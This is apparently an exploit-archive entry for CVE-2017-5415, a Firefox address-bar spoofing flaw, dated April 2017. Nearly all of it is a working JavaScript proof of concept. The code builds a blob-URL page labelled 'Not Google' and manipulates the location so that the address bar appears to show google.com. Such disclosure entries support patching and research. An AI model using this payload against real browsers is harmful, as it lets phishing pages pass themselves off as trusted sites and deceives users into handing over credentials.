Mozilla Firefox - Address Bar Spoofing

Related Vulnerabilities: CVE-2017-5415  
Publish Date: 14 Apr 2017
Author: 649
                							

                <script>
location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'}))
</script>